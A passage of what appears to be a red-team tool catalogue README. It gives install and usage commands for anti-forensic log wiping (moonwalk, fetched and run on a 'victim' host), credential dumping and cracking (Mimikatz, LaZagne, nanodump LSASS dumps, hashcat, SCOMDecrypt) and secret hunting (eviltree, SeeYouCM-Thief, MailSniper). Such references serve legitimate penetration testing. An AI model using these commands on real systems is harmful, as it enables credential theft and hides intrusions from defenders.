1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 
1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">moonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine.</p> <p dir="auto">It saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk"><pre>curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Start moonwalk straight after getting a shell on the victim Linux endpoint curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk chmod +x moonwalk moonwalk start # Once you are finished, clear your traces moonwalk finish"><pre><span class="pl-c"><span class="pl-c">#</span> Start moonwalk straight after getting a shell on the victim Linux endpoint</span> curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk chmod +x moonwalk moonwalk start <span class="pl-c"><span class="pl-c">#</span> Once you are finished, clear your traces </span> moonwalk finish</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png"><img src="https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a 
href="https://github.com/mufeedvh/moonwalk">https://github.com/mufeedvh/moonwalk</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Credential Access</h1><a id="user-content-credential-access" class="anchor" aria-label="Permalink: Credential Access" href="#credential-access"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a></h3><a id="user-content-mimikatz" class="anchor" aria-label="Permalink: 🔙Mimikatz" href="#mimikatz"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Great tool for gaining access to hashed 
and cleartext passwords on a victims endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.</p> <p dir="auto"><strong>Install:</strong></p> <ol dir="auto"> <li>Download the <a href="https://github.com/gentilkiwi/mimikatz/releases">mimikatz_trunk.7z</a> file.</li> <li>Once downloaded, the <code>mimikatz.exe</code> binary is in the <code>x64</code> folder.</li> </ol> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=".\mimikatz.exe privilege::debug"><pre>.<span class="pl-cce">\m</span>imikatz.exe privilege::debug</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png"><img src="https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/AlessandroZ/LaZagne">LaZagne</a></h3><a id="user-content-lazagne" class="anchor" aria-label="Permalink: 🔙LaZagne" href="#lazagne"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p 
dir="auto">Nice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.</p> <p dir="auto"><strong>Install: (Binary)</strong></p> <p dir="auto">You can install the standalone binary from <a href="https://github.com/AlessandroZ/LaZagne/releases/">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Launch all modes .\laZagne.exe all # Launch only a specific module .\laZagne.exe browsers # Launch only a specific software script .\laZagne.exe browsers -firefox"><pre><span class="pl-c"><span class="pl-c">#</span> Launch all modes</span> .<span class="pl-cce">\l</span>aZagne.exe all <span class="pl-c"><span class="pl-c">#</span> Launch only a specific module</span> .<span class="pl-cce">\l</span>aZagne.exe browsers <span class="pl-c"><span class="pl-c">#</span> Launch only a specific software script</span> .<span class="pl-cce">\l</span>aZagne.exe browsers -firefox</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png"><img src="https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/hashcat/hashcat">hashcat</a></h3><a id="user-content-hashcat" class="anchor" aria-label="Permalink: 🔙hashcat" href="#hashcat"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 
1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Tool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found <a href="https://hashcat.net/wiki/doku.php?id=example_hashes" rel="nofollow">here</a>).</p> <p dir="auto"><strong>Install: Binary</strong></p> <p dir="auto">You can install the standalone binary from <a href="https://hashcat.net/hashcat/" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=".\hashcat.exe --help"><pre>.<span class="pl-cce">\h</span>ashcat.exe --help</pre></div> <p dir="auto">Nice hashcat command <a href="https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/" rel="nofollow">cheatsheet</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png"><img src="https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/openwall/john">John the Ripper</a></h3><a id="user-content-john-the-ripper" class="anchor" aria-label="Permalink: 🔙John the Ripper" href="#john-the-ripper"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 
.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Another password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt-get install john -y"><pre>sudo apt-get install john -y</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="john"><pre>john</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png"><img src="https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/nccgroup/SCOMDecrypt">SCOMDecrypt</a></h3><a id="user-content-scomdecrypt" class="anchor" aria-label="Permalink: 🔙SCOMDecrypt" href="#scomdecrypt"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 
2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.</p> <p dir="auto">NCC blog post - <a href="https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/" rel="nofollow">'SCOMplicated? – Decrypting SCOM “RunAs” credentials'</a></p> <p dir="auto"><strong>Pre-requisites:</strong></p> <p dir="auto">To run the tool you will require administrative privileges on the SCOM server. You will also need to ensure that you have read access to the following registry key:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins"><pre class="notranslate"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins </code></pre></div> <p dir="auto">You can check manually that you can see the database by gathering the connection details from the following keys:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName"><pre class="notranslate"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName </code></pre></div> <p dir="auto"><strong>Install: 
(PS1)</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/nccgroup/SCOMDecrypt cd .\SCOMDecrypt\SCOMDecrypt\ . .\Invoke-SCOMDecrypt.ps1"><pre class="notranslate"><code>git clone https://github.com/nccgroup/SCOMDecrypt cd .\SCOMDecrypt\SCOMDecrypt\ . .\Invoke-SCOMDecrypt.ps1 </code></pre></div> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">Using <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a> you can compile the SCOMDecrypt binary.</p> <p dir="auto">Open the SCOMDecrypt <a href="https://github.com/nccgroup/SCOMDecrypt">project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# PS1 Invoke-SCOMDecrypt # Compiled C# binary .\SCOMDecrypt.exe"><pre><span class="pl-c"><span class="pl-c">#</span> PS1</span> Invoke-SCOMDecrypt <span class="pl-c"><span class="pl-c">#</span> Compiled C# binary</span> .<span class="pl-cce">\S</span>COMDecrypt.exe</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png"><img src="https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image text used from <a href="https://github.com/nccgroup/SCOMDecrypt">https://github.com/nccgroup/SCOMDecrypt</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/helpsystems/nanodump">nanodump</a></h3><a id="user-content-nanodump" class="anchor" aria-label="Permalink: 🔙nanodump" href="#nanodump"><svg 
class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">The LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.</p> <p dir="auto">Creating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.</p> <p dir="auto">This allows for the creation of a minidump of the LSASS process.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/helpsystems/nanodump.git"><pre>git clone https://github.com/helpsystems/nanodump.git</pre></div> <p dir="auto"><strong>Install: (Linux with MinGW)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="make -f Makefile.mingw"><pre>make -f Makefile.mingw</pre></div> <p dir="auto"><strong>Install: (Windows with MSVC)</strong></p> <div class="highlight highlight-source-shell 
notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="nmake -f Makefile.msvc"><pre>nmake -f Makefile.msvc</pre></div> <p dir="auto"><strong>Install: (CobaltStrike only)</strong></p> <p dir="auto">Import the <code>NanoDump.cna</code> script on Cobalt Strike.</p> <p dir="auto">Full installation information can be found <a href="https://github.com/helpsystems/nanodump">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run nanodump.x64.exe # Leverage the Silent Process Exit technique nanodump --silent-process-exit C:\Windows\Temp\ # Leverage the Shtinkering technique nanodump --shtinkering"><pre><span class="pl-c"><span class="pl-c">#</span> Run</span> nanodump.x64.exe <span class="pl-c"><span class="pl-c">#</span> Leverage the Silent Process Exit technique</span> nanodump --silent-process-exit C:<span class="pl-cce">\W</span>indows<span class="pl-cce">\T</span>emp\ <span class="pl-c"><span class="pl-c">#</span> Leverage the Shtinkering technique</span> nanodump --shtinkering</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/helpsystems/nanodump#1-usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg"><img src="https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg" alt="nanodump" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/helpsystems/nanodump">https://github.com/helpsystems/nanodump</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/t3l3machus/eviltree">eviltree</a></h3><a id="user-content-eviltree" 
class="anchor" aria-label="Permalink: 🔙eviltree" href="#eviltree"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A standalone python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:</p> <ul dir="auto"> <li>While searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage.</li> <li><code>tree</code> is an amazing tool for analyzing directory structures. 
It's really handy to have a standalone alternative to the command for post-exploitation enumeration, as it is not pre-installed on every Linux distro and is kind of limited on Windows (compared to the UNIX version).</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/t3l3machus/eviltree"><pre>git clone https://github.com/t3l3machus/eviltree</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Running a regex that essentially matches strings similar to: password = something against /var/www python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -v # Using comma separated keywords instead of regex python3 eviltree.py -r C:\Users\USERNAME -k passw,admin,account,login,user -L 3 -v"><pre><span class="pl-c"><span class="pl-c">#</span> Running a regex that essentially matches strings similar to: password = something against /var/www</span> python3 eviltree.py -r /var/www -x <span class="pl-s"><span class="pl-pds">"</span>.{0,3}passw.{0,3}[=]{1}.{0,18}<span class="pl-pds">"</span></span> -v <span class="pl-c"><span class="pl-c">#</span> Using comma separated keywords instead of regex</span> python3 eviltree.py -r C:<span class="pl-cce">\U</span>sers<span class="pl-cce">\U</span>SERNAME -k passw,admin,account,login,user -L 3 -v</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png"><img src="https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a 
href="https://github.com/t3l3machus/eviltree">https://github.com/t3l3machus/eviltree</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/trustedsec/SeeYouCM-Thief">SeeYouCM-Thief</a></h3><a id="user-content-seeyoucm-thief" class="anchor" aria-label="Permalink: 🔙SeeYouCM-Thief" href="#seeyoucm-thief"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials.</p> <p dir="auto">Will also optionally enumerate active directory users from the UDS API.</p> <p dir="auto"><a href="https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/" rel="nofollow">Blog - Exploiting common misconfigurations in cisco phone systems</a></p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/trustedsec/SeeYouCM-Thief python3 -m pip install -r requirements.txt"><pre>git clone https://github.com/trustedsec/SeeYouCM-Thief python3 -m pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight 
highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Enumerate Active Directory users from the UDS api on the CUCM ./thief.py -H <CUCM server> --userenum # Without specifying a phone IP address the script will attempt to download every config in the listing. ./thief.py -H <Cisco CUCM Server> [--verbose] # Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet. ./thief.py --phone <Cisco IP Phoner> [--verbose] # Specify a subnet to scan with reverse lookups. ./thief.py --subnet <subnet to scan> [--verbose]"><pre><span class="pl-c"><span class="pl-c">#</span> Enumerate Active Directory users from the UDS api on the CUCM</span> ./thief.py -H <span class="pl-k"><</span>CUCM server<span class="pl-k">></span> --userenum <span class="pl-c"><span class="pl-c">#</span> Without specifying a phone IP address the script will attempt to download every config in the listing.</span> ./thief.py -H <span class="pl-k"><</span>Cisco CUCM Server<span class="pl-k">></span> [--verbose] <span class="pl-c"><span class="pl-c">#</span> Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.</span> ./thief.py --phone <span class="pl-k"><</span>Cisco IP Phoner<span class="pl-k">></span> [--verbose] <span class="pl-c"><span class="pl-c">#</span> Specify a subnet to scan with reverse lookups.</span> ./thief.py --subnet <span class="pl-k"><</span>subnet to scan<span class="pl-k">></span> [--verbose]</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png"><img src="https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a 
href="https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/" rel="nofollow">https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/dafthack/MailSniper">MailSniper</a></h3><a id="user-content-mailsniper" class="anchor" aria-label="Permalink: 🔙MailSniper" href="#mailsniper"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). 
It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.</p> <p dir="auto">MailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS, and checking mailbox permissions for every Exchange user at an organization.</p> <p dir="auto">Nice blog post with more information <a href="https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/" rel="nofollow">here</a>.</p> <p dir="auto"><a href="http://www.dafthack.com/files/MailSniper-Field-Manual.pdf" rel="nofollow">MailSniper Field Manual</a></p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/dafthack/MailSniper cd MailSniper Import-Module MailSniper.ps1"><pre class="notranslate"><code>git clone 